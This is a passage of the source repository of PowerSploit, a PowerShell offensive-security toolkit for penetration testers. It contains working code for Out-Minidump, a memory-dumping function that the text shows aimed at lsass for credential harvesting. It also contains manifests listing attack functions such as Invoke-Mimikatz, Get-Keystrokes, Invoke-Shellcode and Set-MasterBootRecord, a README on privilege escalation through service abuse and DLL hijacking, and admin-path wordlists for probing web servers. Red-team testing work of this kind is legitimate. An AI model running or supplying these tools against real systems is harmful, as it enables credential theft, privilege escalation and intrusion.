23 | LPVOID lpReserved
24 | )
25 | {
26 | switch (ul_reason_for_call)
27 | {
28 | case DLL_PROCESS_ATTACH:
29 | case DLL_THREAD_ATTACH:
30 | case DLL_THREAD_DETACH:
31 | case DLL_PROCESS_DETACH:
32 | break;
33 | }
34 | return TRUE;
35 | }
36 |
37 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParserDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 | // TODO: reference additional headers your program requires here
19 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/Out-Minidump.ps1:
--------------------------------------------------------------------------------
1 | function Out-Minidump
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Generates a full-memory minidump of a process.
7 |
8 | PowerSploit Function: Out-Minidump
9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Out-Minidump writes a process dump file with all process memory to disk.
17 | This is similar to running procdump.exe with the '-ma' switch.
18 |
19 | .PARAMETER Process
20 |
21 | Specifies the process for which a dump will be generated. The process object
22 | is obtained with Get-Process.
23 |
24 | .PARAMETER DumpFilePath
25 |
26 | Specifies the path where dump files will be written. By default, dump files
27 | are written to the current working directory. Dump file names take following
28 | form: processname_id.dmp
29 |
30 | .EXAMPLE
31 |
32 | Out-Minidump -Process (Get-Process -Id 4293)
33 |
34 | Description
35 | -----------
36 | Generate a minidump for process ID 4293.
37 |
38 | .EXAMPLE
39 |
40 | Get-Process lsass | Out-Minidump
41 |
42 | Description
43 | -----------
44 | Generate a minidump for the lsass process. Note: To dump lsass, you must be
45 | running from an elevated prompt.
46 |
47 | .EXAMPLE
48 |
49 | Get-Process | Out-Minidump -DumpFilePath C:\temp
50 |
51 | Description
52 | -----------
53 | Generate a minidump of all running processes and save them to C:\temp.
54 |
55 | .INPUTS
56 |
57 | System.Diagnostics.Process
58 |
59 | You can pipe a process object to Out-Minidump.
60 |
61 | .OUTPUTS
62 |
63 | System.IO.FileInfo
64 |
65 | .LINK
66 |
67 | http://www.exploit-monday.com/
68 | #>
69 |
70 | [CmdletBinding()]
71 | Param (
72 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
73 | [System.Diagnostics.Process]
74 | $Process,
75 |
76 | [Parameter(Position = 1)]
77 | [ValidateScript({ Test-Path $_ })]
78 | [String]
79 | $DumpFilePath = $PWD
80 | )
81 |
82 | BEGIN
83 | {
84 | $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
85 | $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
86 | $Flags = [Reflection.BindingFlags] 'NonPublic, Static'
87 | $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
88 | $MiniDumpWithFullMemory = [UInt32] 2
89 | }
90 |
91 | PROCESS
92 | {
93 | $ProcessId = $Process.Id
94 | $ProcessName = $Process.Name
95 | $ProcessHandle = $Process.Handle
96 | $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
97 |
98 | $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
99 |
100 | $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
101 |
102 | $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
103 | $ProcessId,
104 | $FileStream.SafeFileHandle,
105 | $MiniDumpWithFullMemory,
106 | [IntPtr]::Zero,
107 | [IntPtr]::Zero,
108 | [IntPtr]::Zero))
109 |
110 | $FileStream.Close()
111 |
112 | if (-not $Result)
113 | {
114 | $Exception = New-Object ComponentModel.Win32Exception
115 | $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
116 |
117 | # Remove any partially written dump files. For example, a partial dump will be written
118 | # in the case when 32-bit PowerShell tries to dump a 64-bit process.
119 | Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
120 |
121 | throw $ExceptionMessage
122 | }
123 | else
124 | {
125 | Get-ChildItem $ProcessDumpPath
126 | }
127 | }
128 |
129 | END {}
130 | }
131 |
--------------------------------------------------------------------------------
/Exfiltration/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Exfiltration`
7 |
8 | To see the commands imported, type `Get-Command -Module Exfiltration`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | PowerSploit is provided under the 3-clause BSD license below.
2 |
3 | *************************************************************
4 |
5 | Copyright (c) 2012, Matthew Graeber
6 | All rights reserved.
7 |
8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
9 |
10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Mayhem/Mayhem.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Mayhem.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Mayhem Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/Mayhem/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Mayhem`
7 |
8 | To see the commands imported, type `Get-Command -Module Mayhem`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Persistence/Persistence.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Persistence.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '633d0f10-a056-41da-869d-6d2f75430195'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Persistence Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/Persistence/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Persistence`
7 |
8 | To see the commands imported, type `Get-Command -Module Persistence`
9 |
10 | For help on each individual command, Get-Help is your friend.
--------------------------------------------------------------------------------
/PowerSploit.psd1:
--------------------------------------------------------------------------------
1 | @{
2 | # Script module or binary module file associated with this manifest.
3 | ModuleToProcess = 'PowerSploit.psm1'
4 |
5 | # Version number of this module.
6 | ModuleVersion = '3.0.0.0'
7 |
8 | # ID used to uniquely identify this module
9 | GUID = '6753b496-d842-40a3-924a-0f09e248640c'
10 |
11 | # Author of this module
12 | Author = 'Matthew Graeber'
13 |
14 | # Copyright statement for this module
15 | Copyright = 'BSD 3-Clause'
16 |
17 | # Description of the functionality provided by this module
18 | Description = 'PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers and red team operator during all phases of an engagement.'
19 |
20 | # Minimum version of the Windows PowerShell engine required by this module
21 | PowerShellVersion = '2.0'
22 |
23 | # Functions to export from this module
24 | FunctionsToExport = @(
25 | 'Add-NetUser',
26 | 'Add-ObjectAcl',
27 | 'Add-Persistence',
28 | 'Add-ServiceDacl',
29 | 'Convert-NameToSid',
30 | 'Convert-NT4toCanonical',
31 | 'Convert-SidToName',
32 | 'Copy-ClonedFile',
33 | 'Find-AVSignature',
34 | 'Find-ComputerField',
35 | 'Find-ForeignGroup',
36 | 'Find-ForeignUser',
37 | 'Find-GPOComputerAdmin',
38 | 'Find-GPOLocation',
39 | 'Find-InterestingFile',
40 | 'Find-LocalAdminAccess',
41 | 'Find-PathDLLHijack',
42 | 'Find-ProcessDLLHijack',
43 | 'Find-ManagedSecurityGroups',
44 | 'Find-UserField',
45 | 'Get-ADObject',
46 | 'Get-ApplicationHost',
47 | 'Get-CachedRDPConnection',
48 | 'Get-ComputerDetails',
49 | 'Get-ComputerProperty',
50 | 'Get-CurrentUserTokenGroupSid',
51 | 'Get-DFSshare',
52 | 'Get-DomainPolicy',
53 | 'Get-ExploitableSystem',
54 | 'Get-GPPPassword',
55 | 'Get-HttpStatus',
56 | 'Get-Keystrokes',
57 | 'Get-LastLoggedOn',
58 | 'Get-ModifiablePath',
59 | 'Get-ModifiableRegistryAutoRun',
60 | 'Get-ModifiableScheduledTaskFile',
61 | 'Get-ModifiableService',
62 | 'Get-ModifiableServiceFile',
63 | 'Get-NetComputer',
64 | 'Get-NetDomain',
65 | 'Get-NetDomainController',
66 | 'Get-NetDomainTrust',
67 | 'Get-NetFileServer',
68 | 'Get-NetForest',
69 | 'Get-NetForestCatalog',
70 | 'Get-NetForestDomain',
71 | 'Get-NetForestTrust',
72 | 'Get-NetGPO',
73 | 'Get-NetGPOGroup',
74 | 'Get-NetGroup',
75 | 'Get-NetGroupMember',
76 | 'Get-NetLocalGroup',
77 | 'Get-NetLoggedon',
78 | 'Get-NetOU',
79 | 'Get-NetProcess',
80 | 'Get-NetRDPSession',
81 | 'Get-NetSession',
82 | 'Get-NetShare',
83 | 'Get-NetSite',
84 | 'Get-NetSubnet',
85 | 'Get-NetUser',
86 | 'Get-ObjectAcl',
87 | 'Get-PathAcl',
88 | 'Get-Proxy',
89 | 'Get-RegistryAlwaysInstallElevated',
90 | 'Get-RegistryAutoLogon',
91 | 'Get-SecurityPackages',
92 | 'Get-ServiceDetail',
93 | 'Get-ServiceUnquoted',
94 | 'Get-SiteListPassword',
95 | 'Get-System',
96 | 'Get-TimedScreenshot',
97 | 'Get-UnattendedInstallFile',
98 | 'Get-UserEvent',
99 | 'Get-UserProperty',
100 | 'Get-VaultCredential',
101 | 'Get-VolumeShadowCopy',
102 | 'Get-Webconfig',
103 | 'Install-ServiceBinary',
104 | 'Install-SSP',
105 | 'Invoke-ACLScanner',
106 | 'Invoke-AllChecks',
107 | 'Invoke-CheckLocalAdminAccess',
108 | 'Invoke-CredentialInjection',
109 | 'Invoke-DllInjection',
110 | 'Invoke-EnumerateLocalAdmin',
111 | 'Invoke-EventHunter',
112 | 'Invoke-FileFinder',
113 | 'Invoke-MapDomainTrust',
114 | 'Invoke-Mimikatz',
115 | 'Invoke-NinjaCopy',
116 | 'Invoke-Portscan',
117 | 'Invoke-ProcessHunter',
118 | 'Invoke-ReflectivePEInjection',
119 | 'Invoke-ReverseDnsLookup',
120 | 'Invoke-ServiceAbuse',
121 | 'Invoke-ShareFinder',
122 | 'Invoke-Shellcode',
123 | 'Invoke-TokenManipulation',
124 | 'Invoke-UserHunter',
125 | 'Invoke-WmiCommand',
126 | 'Mount-VolumeShadowCopy',
127 | 'New-ElevatedPersistenceOption',
128 | 'New-UserPersistenceOption',
129 | 'New-VolumeShadowCopy',
130 | 'Out-CompressedDll',
131 | 'Out-EncodedCommand',
132 | 'Out-EncryptedScript',
133 | 'Out-Minidump',
134 | 'Remove-Comments',
135 | 'Remove-VolumeShadowCopy',
136 | 'Restore-ServiceBinary',
137 | 'Set-ADObject',
138 | 'Set-CriticalProcess',
139 | 'Set-MacAttribute',
140 | 'Set-MasterBootRecord',
141 | 'Set-ServiceBinPath',
142 | 'Test-ServiceDaclPermission',
143 | 'Write-HijackDll',
144 | 'Write-ServiceBinary',
145 | 'Write-UserAddMSI'
146 | )
147 |
148 | # List of all modules packaged with this module.
149 | ModuleList = @( @{ModuleName = 'AntivirusBypass'; ModuleVersion = '3.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'},
150 | @{ModuleName = 'CodeExecution'; ModuleVersion = '3.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'},
151 | @{ModuleName = 'Exfiltration'; ModuleVersion = '3.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'},
152 | @{ModuleName = 'Recon'; ModuleVersion = '3.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'},
153 | @{ModuleName = 'ScriptModification'; ModuleVersion = '3.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'},
154 | @{ModuleName = 'Persistence'; ModuleVersion = '3.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'},
155 | @{ModuleName = 'PrivEsc'; ModuleVersion = '3.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'} )
156 |
157 | PrivateData = @{
158 |
159 | PSData = @{
160 |
161 | # Tags applied to this module. These help with module discovery in online galleries.
162 | Tags = @('security','pentesting','red team','offense')
163 |
164 | # A URL to the license for this module.
165 | LicenseUri = 'http://www.apache.org/licenses/LICENSE-2.0.html'
166 |
167 | # A URL to the main website for this project.
168 | ProjectUri = 'https://github.com/PowerShellMafia/PowerSploit'
169 |
170 | }
171 |
172 | }
173 |
174 | }
175 |
--------------------------------------------------------------------------------
/PowerSploit.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and ($_.Name -ne 'Tests') } | % { Import-Module $_.FullName -DisableNameChecking }
2 |
--------------------------------------------------------------------------------
/PowerSploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.23107.0
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{F5034706-568F-408A-B7B3-4D38C6DB8A32}") = "PowerSploit", "PowerSploit.pssproj", "{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.ActiveCfg = Release|Any CPU
15 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.Build.0 = Release|Any CPU
16 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/Privesc/Privesc.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Privesc.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'
11 |
12 | # Author of this module
13 | Author = 'Will Schroeder'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Privesc Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = @(
26 | 'Add-ServiceDacl',
27 | 'Find-PathDLLHijack',
28 | 'Find-ProcessDLLHijack',
29 | 'Get-ApplicationHost',
30 | 'Get-CachedGPPPassword',
31 | 'Get-CurrentUserTokenGroupSid',
32 | 'Get-ModifiablePath',
33 | 'Get-ModifiableRegistryAutoRun',
34 | 'Get-ModifiableScheduledTaskFile',
35 | 'Get-ModifiableService',
36 | 'Get-ModifiableServiceFile',
37 | 'Get-RegistryAlwaysInstallElevated',
38 | 'Get-RegistryAutoLogon',
39 | 'Get-ServiceDetail',
40 | 'Get-ServiceUnquoted',
41 | 'Get-SiteListPassword',
42 | 'Get-System',
43 | 'Get-UnattendedInstallFile',
44 | 'Get-Webconfig',
45 | 'Install-ServiceBinary',
46 | 'Invoke-AllChecks',
47 | 'Invoke-ServiceAbuse',
48 | 'Restore-ServiceBinary',
49 | 'Set-ServiceBinPath',
50 | 'Test-ServiceDaclPermission',
51 | 'Write-HijackDll',
52 | 'Write-ServiceBinary',
53 | 'Write-UserAddMSI'
54 | )
55 |
56 | # List of all files packaged with this module
57 | FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md'
58 |
59 | }
60 |
61 |
--------------------------------------------------------------------------------
/Privesc/Privesc.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/Privesc/README.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Privesc folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Privesc`
7 |
8 | To see the commands imported, type `Get-Command -Module Privesc`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
13 |
14 |
15 | ## PowerUp
16 |
17 | PowerUp aims to be a clearinghouse of common Windows privilege escalation
18 | vectors that rely on misconfigurations.
19 |
20 | Running Invoke-AllChecks will output any identifiable vulnerabilities along
21 | with specifications for any abuse functions. The -HTMLReport flag will also
22 | generate a COMPUTER.username.html version of the report.
23 |
24 | Author: @harmj0y
25 | License: BSD 3-Clause
26 | Required Dependencies: None
27 | Optional Dependencies: None
28 |
29 |
30 | ### Service Enumeration:
31 | Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name
32 | Get-ModifiableServiceFile - returns services where the current user can write to the service binary path or its config
33 | Get-ModifiableService - returns services the current user can modify
34 | Get-ServiceDetail - returns detailed information about a specified service
35 |
36 | ### Service Abuse:
37 | Invoke-ServiceAbuse - modifies a vulnerable service to create a local admin or execute a custom command
38 | Write-ServiceBinary - writes out a patched C# service binary that adds a local admin or executes a custom command
39 | Install-ServiceBinary - replaces a service binary with one that adds a local admin or executes a custom command
40 | Restore-ServiceBinary - restores a replaced service binary with the original executable
41 |
42 | ### DLL Hijacking:
43 | Find-ProcessDLLHijack - finds potential DLL hijacking opportunities for currently running processes
44 | Find-PathDLLHijack - finds service %PATH% DLL hijacking opportunities
45 | Write-HijackDll - writes out a hijackable DLL
46 |
47 | ### Registry Checks:
48 | Get-RegistryAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set
49 | Get-RegistryAutoLogon - checks for Autologon credentials in the registry
50 | Get-ModifiableRegistryAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
51 |
52 | ### Miscellaneous Checks:
53 | Get-ModifiableScheduledTaskFile - find schtasks with modifiable target files
54 | Get-UnattendedInstallFile - finds remaining unattended installation files
55 | Get-Webconfig - checks for any encrypted web.config strings
56 | Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords
57 | Get-SiteListPassword - retrieves the plaintext passwords for any found McAfee's SiteList.xml files
58 | Get-CachedGPPPassword - checks for passwords in cached Group Policy Preferences files
59 |
60 | ### Other Helpers/Meta-Functions:
61 | Get-ModifiablePath - tokenizes an input string and returns the files in it the current user can modify
62 | Get-CurrentUserTokenGroupSid - returns all SIDs that the current user is a part of, whether they are disabled or not
63 | Add-ServiceDacl - adds a Dacl field to a service object returned by Get-Service
64 | Set-ServiceBinPath - sets the binary path for a service to a specified value through Win32 API methods
65 | Test-ServiceDaclPermission - tests one or more passed services or service names against a given permission set
66 | Write-UserAddMSI - write out a MSI installer that prompts for a user to be added
67 | Invoke-AllChecks - runs all current escalation checks and returns a report
68 |
--------------------------------------------------------------------------------
/Recon/Dictionaries/admin.txt:
--------------------------------------------------------------------------------
1 | admin1.php
2 | admin.asp
3 | admin/account.asp
4 | admin/account.html
5 | admin/account.php
6 | admin/controlpanel.asp
7 | admin/controlpanel.html
8 | admin/controlpanel.php
9 | admin/cp.asp
10 | admin/cp.html
11 | admin/cp.php
12 | admin/home.asp
13 | admin/home.php
14 | admin/index.asp
15 | admin/index.html
16 | admin/login.asp
17 | admin/login.html
18 | admin/login.php
19 | admin1.asp
20 | admin1.html
21 | admin1/
22 | admin2.asp
23 | admin2.html
24 | admin2.php
25 | admin4_account/
26 | admin4_colon/
27 | admincontrol.asp
28 | admincontrol.html
29 | admincontrol.php
30 | administer/
31 | administr8.asp
32 | administr8.html
33 | administr8.php
34 | administr8/
35 | administracao.php
36 | administracao/
37 | administracion.php
38 | administracion/
39 | administrateur.php
40 | administrateur/
41 | administratie/
42 | administration.html
43 | administration.php
44 | administration/
45 | administrator.asp
46 | administrator.html
47 | administrator.php
48 | administrator/account.asp
49 | administrator/account.html
50 | administrator/account.php
51 | administrator/index.asp
52 | administrator/index.html
53 | administrator/index.php
54 | administrator/login.asp
55 | administrator/login.html
56 | administrator/login.php
57 | administratoraccounts/
58 | administrators/
59 | administrivia/
60 | adminpanel.asp
61 | adminpanel.html
62 | adminpanel.php
63 | adminpro/
64 | admins.asp
65 | admins.html
66 | admins.php
67 | admins/
68 | AdminTools/
69 | amministratore.php
70 | amministratore/
71 | autologin/
72 | banneradmin/
73 | bbadmin/
74 | beheerder.php
75 | beheerder/
76 | bigadmin/
77 | blogindex/
78 | cadmins/
79 | ccms/
80 | ccms/index.php
81 | ccms/login.php
82 | ccp14admin/
83 | cmsadmin/
84 | configuration/
85 | configure/
86 | controlpanel.asp
87 | controlpanel.html
88 | controlpanel.php
89 | controlpanel/
90 | cp.asp
91 | cp.html
92 | cp.php
93 | cpanel_file/
94 | customer_login/
95 | database_administration/
96 | Database_Administration/
97 | dir-login/
98 | directadmin/
99 | ezsqliteadmin/
100 | fileadmin.asp
101 | fileadmin.html
102 | fileadmin.php
103 | formslogin/
104 | globes_admin/
105 | hpwebjetadmin/
106 | Indy_admin/
107 | irc-macadmin/
108 | LiveUser_Admin/
109 | login_db/
110 | login-redirect/
111 | login-us/
112 | login.asp
113 | login.html
114 | login.php
115 | login1/
116 | loginflat/
117 | logo_sysadmin/
118 | Lotus_Domino_Admin/
119 | macadmin/
120 | maintenance/
121 | manuallogin/
122 | memlogin/
123 | meta_login/
124 | modelsearch/login.asp
125 | modelsearch/login.php
126 | moderator.asp
127 | moderator.html
128 | moderator.php
129 | moderator/
130 | moderator/admin.asp
131 | moderator/admin.html
132 | moderator/admin.php
133 | moderator/login.asp
134 | moderator/login.html
135 | moderator/login.php
136 | myadmin/
137 | navSiteAdmin/
138 | newsadmin/
139 | openvpnadmin/
140 | painel/
141 | panel/
142 | pgadmin/
143 | phpldapadmin/
144 | phppgadmin/
145 | phpSQLiteAdmin/
146 | platz_login/
147 | power_user/
148 | project-admins/
149 | pureadmin/
150 | radmind-1/
151 | radmind/
152 | rcLogin/
153 | server_admin_small/
154 | Server.asp
155 | Server.html
156 | Server.php
157 | ServerAdministrator/
158 | showlogin/
159 | simpleLogin/
160 | smblogin/
161 | sql-admin/
162 | ss_vms_admin_sm/
163 | sshadmin/
164 | staradmin/
165 | sub-login/
166 | Super-Admin/
167 | support_login/
168 | sys-admin/
169 | sysadmin.asp
170 | sysadmin.html
171 | sysadmin.php
172 | sysadmin/
173 | SysAdmin/
174 | SysAdmin2/
175 | sysadmins/
176 | system_administration/
177 | system-administration/
178 | ur-admin.asp
179 | ur-admin.html
180 | ur-admin.php
181 | ur-admin/
182 | useradmin/
183 | UserLogin/
184 | utility_login/
185 | v2/painel/
186 | vadmind/
187 | vmailadmin/
188 | webadmin.asp
189 | webadmin.html
190 | webadmin.php
191 | webmaster/
192 | websvn/
193 | wizmysqladmin/
194 | wp-admin/
195 | wp-login/
196 | xlogin/
197 | yonetici.asp
198 | yonetici.html
199 | yonetici.php
200 | yonetim.asp
201 | yonetim.html
202 | yonetim.php
--------------------------------------------------------------------------------
/Recon/Dictionaries/generic.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xdea/PowerSploit/c7985c9bc31e92bb6243c177d7d1d7e68b6f1816/Recon/Dictionaries/generic.txt
--------------------------------------------------------------------------------
/Recon/Dictionaries/sharepoint.txt:
--------------------------------------------------------------------------------
1 | _catalogs/masterpage/Forms/AllItems.aspx
2 | _catalogs/wp/Forms/AllItems.aspx
3 | _catalogs/wt/Forms/Common.aspx
4 | _layouts/1033/IMAGES
5 | _layouts/aclinv.aspx
6 | _layouts/addrole.aspx
7 | _layouts/AdminRecycleBin.aspx
8 | _layouts/AreaNavigationSettings.aspx
9 | _Layouts/AreaTemplateSettings.aspx
10 | _Layouts/AreaWelcomePage.aspx
11 | _layouts/associatedgroups.aspx
12 | _layouts/bpcf.aspx
13 | _Layouts/ChangeSiteMasterPage.aspx
14 | _layouts/create.aspx
15 | _layouts/editgrp.aspx
16 | _layouts/editprms.aspx
17 | _layouts/groups.aspx
18 | _layouts/help.aspx
19 | _layouts/images/
20 | _layouts/listedit.aspx
21 | _layouts/ManageFeatures.aspx
22 | _layouts/ManageFeatures.aspx?Scope=Site
23 | _layouts/mcontent.aspx
24 | _layouts/mngctype.aspx
25 | _layouts/mngfield.aspx
26 | _layouts/mngsiteadmin.aspx
27 | _layouts/mngsubwebs.aspx
28 | _layouts/mngsubwebs.aspx?view=sites
